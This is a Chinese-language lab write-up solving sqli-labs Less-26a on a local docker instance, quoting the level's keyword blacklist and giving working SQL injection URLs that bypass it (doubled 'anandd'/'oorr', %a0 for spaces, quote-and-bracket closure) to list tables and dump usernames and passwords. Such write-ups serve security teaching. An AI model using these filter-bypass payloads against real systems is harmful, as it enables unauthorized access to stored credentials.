前言
26a这题估计肯定跟26题类似,盲猜一波,肯定依旧是过滤了一堆东西,思路还是一样的,过滤注释我们就用引号闭合绕过,过滤and和or我们就用anandd和oorr绕过,过滤了空格我们就用%a0或者%0a绕过
分析源码
function blacklist($id)
{
$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive)
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --
$id= preg_replace('/[#]/',"", $id); //Strip out #
$id= preg_replace('/[\s]/',"", $id); //Strip out spaces
$id= preg_replace('/[\s]/',"", $id); //Strip out spaces
$id= preg_replace('/[\/\\\\]/',"", $id); //Strip out slashes
return $id;
}
可以看出果不出我们所料过滤了一堆
实验环节
前期准备
上节提过在windows系统下使用特殊空格字符代替空格有问题,那么我们这题使用kali部署的sqli-labs
su - root
docker run -d --name sqli-labs -p 80:80 -p 13306:3306 --rm acgpiano/sqli-labs #为了不占用系统资源,这条命令在每次虚拟机关机后会自动清除进程,所以每次开机后都要运行这条命令
浏览器访问Less-26a地址
http://192.168.199.129/Less-26a/
从源码判断闭合方式
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
#从这看闭合方式中可能有单引号和括号,我们实际测试一下
http://192.168.199.129/Less-26a/?id=1') || ('1
#构造语句页面显示正常说明是单引号加括号的字符型注入
判断显示位
http://192.168.199.129/Less-26a/?id=0')union%a0select%a01,2,3||('1'='1
判断库名
http://192.168.199.129/Less-26a/?id=0')%a0union%a0select%a01,database(),3||('1'='1
判断表名
http://192.168.199.129/Less-26a/?id=0')%a0union%a0select%a01,group_concat(table_name),3%a0from%0binfoorrmation_schema.tables%a0where%a0table_schema=database()anandd('1'='1
判断列名
http://192.168.199.129/Less-26a/?id=0')union%a0select%a01,group_concat(column_name),3%a0from%a0infoorrmation_schema.columns%a0where%a0table_schema='security'%a0anandd %a0table_name='emails'%26%26%a0('1'='1
判断数据
http://192.168.199.129/Less-26a/?id=0')%a0union%a0select%a01,group_concat(username,passwoorrd),3%a0from%a0users%a0where%a0('1'='1
评论区